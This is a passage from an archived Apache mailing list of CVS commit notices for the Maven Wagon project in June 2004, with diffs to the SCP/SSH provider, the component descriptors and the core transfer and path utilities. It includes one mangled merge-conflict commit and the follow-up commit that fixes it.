localRepositoryPath, "/maven/poms" ); + File f = new File( localRepositoryPath ); if ( !f.exists() ) { @@ -191,7 +179,6 @@ public void testWagon() throws Exception { - setupRepositories(); setupWagonTestingFixtures(); --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jun 21 17:16:27 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11009 invoked from network); 21 Jun 2004 17:16:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 21 Jun 2004 17:16:27 -0000 Received: (qmail 85684 invoked by uid 500); 21 Jun 2004 17:16:42 -0000 Delivered-To: [email protected] Received: (qmail 85643 invoked by uid 500); 21 Jun 2004 17:16:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 85590 invoked by uid 99); 21 Jun 2004 17:16:38 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Mon, 21 Jun 2004 10:16:38 -0700 Received: (qmail 10980 invoked by uid 1668); 21 Jun 2004 17:16:22 -0000 Date: 21 Jun 2004 17:16:22 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh/src/main/resources/META-INF/plexus components.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/21 10:16:22 Modified: wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java wagon-providers/ssh/src/main/resources/META-INF/plexus components.xml Added: wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh SshCommandExecutor.java Log: Not the best option probably - but I will use ScpWagon for executing remote commands. I need this for deploying sites. Revision Changes Path 1.8 +5 -5 maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java Index: ScpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- ScpWagon.java 3 Jun 2004 18:31:26 -0000 1.7 +++ ScpWagon.java 21 Jun 2004 17:16:22 -0000 1.8 @@ -54,7 +54,7 @@ * */ public class ScpWagon - extends AbstractWagon + extends AbstractWagon implements SshCommandExecutor { public static String EXEC_CHANNEL = "exec"; @@ -194,7 +194,7 @@ session.disconnect(); } - public void executeSimpleCommand( String command ) + public void executeCommand( String command ) throws TransferFailedException { ChannelExec channel = null; @@ -229,7 +229,7 @@ { String mkdirCmd = "mkdir -p " + getRepository().getBasedir() + "/" + PathUtils.dirname( resource ) + "\n"; - executeSimpleCommand( mkdirCmd ); + executeCommand( mkdirCmd ); ChannelExec channel = null; @@ -333,7 +333,7 @@ { String chgrpCmd = "chgrp " + authInfo.getGroup() + " " + getRepository().getBasedir() + "/" + resource + "\n"; - executeSimpleCommand( chgrpCmd ); + executeCommand( chgrpCmd ); // Need to change the mode as well. 1.1 maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/SshCommandExecutor.java Index: SshCommandExecutor.java =================================================================== package org.apache.maven.wagon.providers.ssh; import org.apache.maven.wagon.Wagon; import org.apache.maven.wagon.TransferFailedException; /** * @author <a href="mailto:[email protected]">Michal Maczka</a> * * @version $Id: SshCommandExecutor.java,v 1.1 2004/06/21 17:16:22 michal Exp $ * */ public interface SshCommandExecutor extends Wagon { void executeCommand( String command ) throws TransferFailedException; } 1.2 +8 -1 maven-wagon/wagon-providers/ssh/src/main/resources/META-INF/plexus/components.xml Index: components.xml =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/resources/META-INF/plexus/components.xml,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- components.xml 30 Mar 2004 14:43:07 -0000 1.1 +++ components.xml 21 Jun 2004 17:16:22 -0000 1.2 @@ -4,7 +4,14 @@ <role>org.apache.maven.wagon.Wagon</role> <role-hint>scp</role-hint> <implementation>org.apache.maven.wagon.providers.ssh.ScpWagon</implementation> -1 <instantiation-strategy>per-lookup</instantiation-strategy> +1 <instantiation-strategy>per-lookup</instantiation-strategy> + </component> + </components> + <components> + <component> + <role>org.apache.maven.wagon.providers.ssh.SshCommandExecutor</role> + <implementation>org.apache.maven.wagon.providers.ssh.ScpWagon</implementation> +1 <instantiation-strategy>per-lookup</instantiation-strategy> </component> </components> </component-set> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jun 22 17:40:25 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38292 invoked from network); 22 Jun 2004 17:40:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 22 Jun 2004 17:40:25 -0000 Received: (qmail 97947 invoked by uid 500); 22 Jun 2004 17:35:57 -0000 Delivered-To: [email protected] Received: (qmail 97349 invoked by uid 500); 22 Jun 2004 17:35:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 96956 invoked by uid 99); 22 Jun 2004 17:35:44 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 22 Jun 2004 10:35:44 -0700 Received: (qmail 33969 invoked by uid 1668); 22 Jun 2004 17:35:30 -0000 Date: 22 Jun 2004 17:35:30 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/repository Repository.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/22 10:35:30 Modified: wagon-api/src/main/java/org/apache/maven/wagon/repository Repository.java Log: contructors were added Revision Changes Path 1.4 +22 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/repository/Repository.java Index: Repository.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/repository/Repository.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- Repository.java 3 Jun 2004 18:26:59 -0000 1.3 +++ Repository.java 22 Jun 2004 17:35:30 -0000 1.4 @@ -57,10 +57,31 @@ private AuthenticationInfo authenticationInfo; + + public Repository( ) + { + + } + + + public Repository( String id, String url ) + { + setId( id ); + + setUrl( url ); + } + + public String getId() { return id; } + + public void setId( String id ) + { + this.id = id; + } + public AuthenticationInfo getAuthenticationInfo() { --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 23 19:48:42 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71654 invoked from network); 23 Jun 2004 19:48:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Jun 2004 19:48:42 -0000 Received: (qmail 61657 invoked by uid 500); 23 Jun 2004 19:49:03 -0000 Delivered-To: [email protected] Received: (qmail 61507 invoked by uid 500); 23 Jun 2004 19:48:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 61279 invoked by uid 99); 23 Jun 2004 19:48:53 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 23 Jun 2004 12:48:53 -0700 Received: (qmail 71601 invoked by uid 1238); 23 Jun 2004 19:48:29 -0000 Date: 23 Jun 2004 19:48:29 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api license.txt X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N evenisse 2004/06/23 12:48:29 Removed: wagon-api license.txt Log: removed duplicate file --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 23 19:52:37 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73715 invoked from network); 23 Jun 2004 19:52:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Jun 2004 19:52:37 -0000 Received: (qmail 71919 invoked by uid 500); 23 Jun 2004 19:52:30 -0000 Delivered-To: [email protected] Received: (qmail 71620 invoked by uid 500); 23 Jun 2004 19:52:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 71489 invoked by uid 99); 23 Jun 2004 19:52:24 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 23 Jun 2004 12:52:24 -0700 Received: (qmail 73400 invoked by uid 1238); 23 Jun 2004 19:51:59 -0000 Date: 23 Jun 2004 19:51:59 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh license.txt X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N evenisse 2004/06/23 12:51:59 Removed: wagon-providers/ftp license.txt wagon-providers/http license.txt wagon-providers/ssh license.txt Log: removed duplicate file --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 25 16:05:26 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48315 invoked from network); 25 Jun 2004 16:05:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Jun 2004 16:05:26 -0000 Received: (qmail 77511 invoked by uid 500); 25 Jun 2004 16:05:36 -0000 Delivered-To: [email protected] Received: (qmail 77494 invoked by uid 500); 25 Jun 2004 16:05:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 19784 invoked by uid 99); 25 Jun 2004 15:19:05 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Date: 25 Jun 2004 15:18:53 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api pom.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N brett 2004/06/25 08:18:53 Modified: wagon-api pom.xml Log: use the nicer style JIRA urls Revision Changes Path 1.2 +1 -1 maven-wagon/wagon-api/pom.xml Index: pom.xml =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/pom.xml,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- pom.xml 9 Jun 2004 03:11:22 -0000 1.1 +++ pom.xml 25 Jun 2004 15:18:53 -0000 1.2 @@ -20,7 +20,7 @@ <package>org.apache.maven.wagon</package> <inceptionYear>2003</inceptionYear> <url>http://maven.apache.org/wagon/wagon-api</url> - <issueTrackingUrl>http://jira.codehaus.org/BrowseProject.jspa?id=10319</issueTrackingUrl> + <issueTrackingUrl>http://jira.codehaus.org/browse/WAGON</issueTrackingUrl> <developers> <developer> <name>Michal Maczka</name> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 25 17:20:22 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85032 invoked from network); 25 Jun 2004 17:20:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Jun 2004 17:20:22 -0000 Received: (qmail 99812 invoked by uid 500); 25 Jun 2004 17:20:32 -0000 Delivered-To: [email protected] Received: (qmail 99723 invoked by uid 500); 25 Jun 2004 17:20:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 99541 invoked by uid 99); 25 Jun 2004 17:20:26 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Fri, 25 Jun 2004 10:20:26 -0700 Received: (qmail 85001 invoked by uid 1668); 25 Jun 2004 17:20:13 -0000 Date: 25 Jun 2004 17:20:13 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon AbstractWagon.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/25 10:20:13 Modified: wagon-api/src/main/java/org/apache/maven/wagon AbstractWagon.java Log: stream are now closed in finally block Revision Changes Path 1.6 +16 -11 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/AbstractWagon.java Index: AbstractWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/AbstractWagon.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- AbstractWagon.java 3 Jun 2004 18:27:00 -0000 1.5 +++ AbstractWagon.java 25 Jun 2004 17:20:13 -0000 1.6 @@ -105,10 +105,6 @@ { transfer( resource, input, output, TransferEvent.REQUEST_GET ); - shutdownStream( input ); - - shutdownStream( output ); - } catch ( IOException e ) { @@ -129,6 +125,13 @@ throw new TransferFailedException( msg, e ); } + finally + { + shutdownStream( input ); + + shutdownStream( output ); + + } fireGetCompleted( resource, destination ); } @@ -142,12 +145,6 @@ { transfer( resource, input, output, TransferEvent.REQUEST_PUT ); - shutdownStream( input ); - - if ( closeOutput ) - { - shutdownStream( output ); - } } catch ( IOException e ) { @@ -157,7 +154,15 @@ throw new TransferFailedException( msg, e ); } + finally + { + shutdownStream( input ); + if ( closeOutput ) + { + shutdownStream( output ); + } + } firePutCompleted( resource, source ); } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 25 18:41:51 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23192 invoked from network); 25 Jun 2004 18:41:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Jun 2004 18:41:51 -0000 Received: (qmail 19026 invoked by uid 500); 25 Jun 2004 18:41:51 -0000 Delivered-To: [email protected] Received: (qmail 18759 invoked by uid 500); 25 Jun 2004 18:41:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 18629 invoked by uid 99); 25 Jun 2004 18:41:47 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Fri, 25 Jun 2004 11:41:46 -0700 Received: (qmail 23013 invoked by uid 1717); 25 Jun 2004 18:41:31 -0000 Date: 25 Jun 2004 18:41:31 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N brett 2004/06/25 11:41:31 Modified: wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java Log: allow empty passphrase to SCP deployer's private key Revision Changes Path 1.9 +21 -4 maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java Index: ScpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java,v retrieving revision 1.8 retrieving revision 1.9 diff -u -r1.8 -r1.9 --- ScpWagon.java 21 Jun 2004 17:16:22 -0000 1.8 +++ ScpWagon.java 25 Jun 2004 18:41:31 -0000 1.9 @@ -108,9 +108,7 @@ { if ( authInfo.getPassphrase() == null ) { - String msg = "Private key provided " + "without passphrase for repo: " + getRepository().getName(); - - throw new AuthenticationException( msg ); + authInfo.setPassphrase( "" ); } fireSessionDebug( "Using private key: " + privateKey ); @@ -285,9 +283,27 @@ throw new TransferFailedException( msg ); } + byte[] buf = new byte[1024]; + // send a content of lfile FileInputStream fis = new FileInputStream( source ); +<<<<<<< ScpWagon.java + try + { + while ( true ) + { + int len = fis.read( buf, 0, buf.length ); + if ( len <= 0 ) break; + out.write( buf, 0, len ); + out.flush(); + } + } + finally + { + fis.close(); + } +======= putTransfer( resource, source, fis, out, false ); byte[] buf = new byte[1024]; @@ -302,6 +318,7 @@ // // out.flush(); // } +>>>>>>> 1.8 // send '\0' buf[0] = 0; --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jun 25 18:43:34 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23964 invoked from network); 25 Jun 2004 18:43:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Jun 2004 18:43:33 -0000 Received: (qmail 23918 invoked by uid 500); 25 Jun 2004 18:43:47 -0000 Delivered-To: [email protected] Received: (qmail 23827 invoked by uid 500); 25 Jun 2004 18:43:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 23777 invoked by uid 99); 25 Jun 2004 18:43:43 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Fri, 25 Jun 2004 11:43:42 -0700 Received: (qmail 23933 invoked by uid 1717); 25 Jun 2004 18:43:27 -0000 Date: 25 Jun 2004 18:43:27 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N brett 2004/06/25 11:43:27 Modified: wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh ScpWagon.java Log: fix mangled commit Revision Changes Path 1.10 +0 -19 maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java Index: ScpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/java/org/apache/maven/wagon/providers/ssh/ScpWagon.java,v retrieving revision 1.9 retrieving revision 1.10 diff -u -r1.9 -r1.10 --- ScpWagon.java 25 Jun 2004 18:41:31 -0000 1.9 +++ ScpWagon.java 25 Jun 2004 18:43:27 -0000 1.10 @@ -283,27 +283,9 @@ throw new TransferFailedException( msg ); } - byte[] buf = new byte[1024]; - // send a content of lfile FileInputStream fis = new FileInputStream( source ); -<<<<<<< ScpWagon.java - try - { - while ( true ) - { - int len = fis.read( buf, 0, buf.length ); - if ( len <= 0 ) break; - out.write( buf, 0, len ); - out.flush(); - } - } - finally - { - fis.close(); - } -======= putTransfer( resource, source, fis, out, false ); byte[] buf = new byte[1024]; @@ -318,7 +300,6 @@ // // out.flush(); // } ->>>>>>> 1.8 // send '\0' buf[0] = 0; --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jun 27 19:50:38 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76495 invoked from network); 27 Jun 2004 19:50:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 27 Jun 2004 19:50:38 -0000 Received: (qmail 43373 invoked by uid 500); 27 Jun 2004 19:50:39 -0000 Delivered-To: [email protected] Received: (qmail 43230 invoked by uid 500); 27 Jun 2004 19:50:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 43060 invoked by uid 99); 27 Jun 2004 19:50:29 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sun, 27 Jun 2004 12:50:29 -0700 Received: (qmail 76461 invoked by uid 1668); 27 Jun 2004 19:50:24 -0000 Date: 27 Jun 2004 19:50:24 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/ssh/src/main/resources/META-INF/plexus components.xml X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/27 12:50:24 Modified: wagon-providers/ssh/src/main/resources/META-INF/plexus components.xml Log: descriptor was wrong Revision Changes Path 1.3 +3 -5 maven-wagon/wagon-providers/ssh/src/main/resources/META-INF/plexus/components.xml Index: components.xml =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/ssh/src/main/resources/META-INF/plexus/components.xml,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- components.xml 21 Jun 2004 17:16:22 -0000 1.2 +++ components.xml 27 Jun 2004 19:50:24 -0000 1.3 @@ -1,17 +1,15 @@ -<component-set> +<component-set> <components> <component> <role>org.apache.maven.wagon.Wagon</role> <role-hint>scp</role-hint> <implementation>org.apache.maven.wagon.providers.ssh.ScpWagon</implementation> -1 <instantiation-strategy>per-lookup</instantiation-strategy> + <instantiation-strategy>per-lookup</instantiation-strategy> </component> - </components> - <components> <component> <role>org.apache.maven.wagon.providers.ssh.SshCommandExecutor</role> <implementation>org.apache.maven.wagon.providers.ssh.ScpWagon</implementation> -1 <instantiation-strategy>per-lookup</instantiation-strategy> + <instantiation-strategy>per-lookup</instantiation-strategy> </component> </components> </component-set> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jun 29 18:44:48 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75478 invoked from network); 29 Jun 2004 18:44:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Jun 2004 18:44:47 -0000 Received: (qmail 42571 invoked by uid 500); 29 Jun 2004 18:42:42 -0000 Delivered-To: [email protected] Received: (qmail 42459 invoked by uid 500); 29 Jun 2004 18:42:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 42346 invoked by uid 99); 29 Jun 2004 18:42:40 -0000 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 29 Jun 2004 11:42:40 -0700 Received: (qmail 57786 invoked by uid 1668); 29 Jun 2004 18:14:28 -0000 Date: 29 Jun 2004 18:14:28 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon AbstractWagon.java PathUtils.java WagonTestCase.java WagonUtils.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/29 11:14:28 Modified: wagon-api/src/main/java/org/apache/maven/wagon/providers/file FileWagon.java wagon-api/src/main/java/org/apache/maven/wagon AbstractWagon.java PathUtils.java WagonTestCase.java WagonUtils.java Log: formatting and minor fixes Revision Changes Path 1.8 +1 -2 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java Index: FileWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- FileWagon.java 19 Jun 2004 14:16:21 -0000 1.7 +++ FileWagon.java 29 Jun 2004 18:14:27 -0000 1.8 @@ -80,7 +80,6 @@ } } - return new LazyFileOutputStream( f ); 1.7 +3 -3 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/AbstractWagon.java Index: AbstractWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/AbstractWagon.java,v retrieving revision 1.6 retrieving revision 1.7 diff -u -r1.6 -r1.7 --- AbstractWagon.java 25 Jun 2004 17:20:13 -0000 1.6 +++ AbstractWagon.java 29 Jun 2004 18:14:28 -0000 1.7 @@ -96,7 +96,7 @@ // Stream i/o // ---------------------------------------------------------------------- - protected void getTransfer(String resource, File destination, InputStream input, OutputStream output) + protected void getTransfer( String resource, File destination, InputStream input, OutputStream output ) throws TransferFailedException { fireGetStarted( resource, destination ); @@ -136,7 +136,7 @@ fireGetCompleted( resource, destination ); } - protected void putTransfer(String resource, File source, InputStream input, OutputStream output, boolean closeOutput) + protected void putTransfer(String resource, File source, InputStream input, OutputStream output, boolean closeOutput ) throws TransferFailedException { firePutStarted( resource, source ); 1.3 +29 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/PathUtils.java Index: PathUtils.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/PathUtils.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- PathUtils.java 3 Jun 2004 18:27:00 -0000 1.2 +++ PathUtils.java 29 Jun 2004 18:14:28 -0000 1.3 @@ -64,6 +64,7 @@ final int max ) { final StringTokenizer tok; + if ( separator == null ) { // Null separator means we're using StringTokenizer's default @@ -76,15 +77,19 @@ } int listSize = tok.countTokens(); + if ( max > 0 && listSize > max ) { listSize = max; } final String[] list = new String[listSize]; + int i = 0; + int lastTokenBegin; int lastTokenEnd = 0; + while ( tok.hasMoreTokens() ) { if ( max > 0 && i == listSize - 1 ) @@ -93,16 +98,23 @@ // tokens left over in our input, the last list // element gets all remaining text. final String endToken = tok.nextToken(); + lastTokenBegin = str.indexOf( endToken, lastTokenEnd ); + list[i] = str.substring( lastTokenBegin ); + break; + } else { list[i] = tok.nextToken(); + lastTokenBegin = str.indexOf( list[i], lastTokenEnd ); + lastTokenEnd = lastTokenBegin + list[i].length(); } + i++; } return list; @@ -124,18 +136,23 @@ } final String protocol = PathUtils.protocol( url ); + if ( protocol == null || protocol.equals( "file" ) ) { return ""; } + String host = url.substring( url.indexOf( "://" ) + 3 ).trim(); int pos = host.indexOf( "/" ); + if ( pos > 0 ) { host = host.substring( 0, pos ); } + pos = host.indexOf( ":" ); + if ( pos > 0 ) { host = host.substring( 0, pos ); @@ -158,6 +175,7 @@ { final int pos = url.indexOf( "://" ); + if ( pos == -1 ) { return ""; @@ -174,26 +192,31 @@ { final String protocol = PathUtils.protocol( url ); + if ( protocol == null || protocol.equals( "file" ) ) { return WagonConstants.UNKNOWN_PORT; } final String host = PathUtils.host( url ); + if ( host == null ) { return WagonConstants.UNKNOWN_PORT; } final String prefix = protocol + "://" + host; + final int start = prefix.length(); if ( url.length() > start && url.charAt( start ) == ':' ) { int end = url.indexOf( '/', start ); + if ( end == -1 ) { end = url.length(); } + return Integer.parseInt( url.substring( start + 1, end ) ); } else @@ -211,7 +234,9 @@ public static String basedir( final String url ) { final String protocol = PathUtils.protocol( url ); + String retValue = null; + if ( protocol.equals( "file" ) ) { retValue = url.substring( protocol.length() + 3 ); @@ -219,8 +244,11 @@ else { final String host = PathUtils.host( url ); + final int port = PathUtils.port( url ); + final int pos; + if ( port != WagonConstants.UNKNOWN_PORT ) { pos = ( protocol + "://" + host + ":" + port + "/" ).length(); 1.11 +2 -2 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java Index: WagonTestCase.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java,v retrieving revision 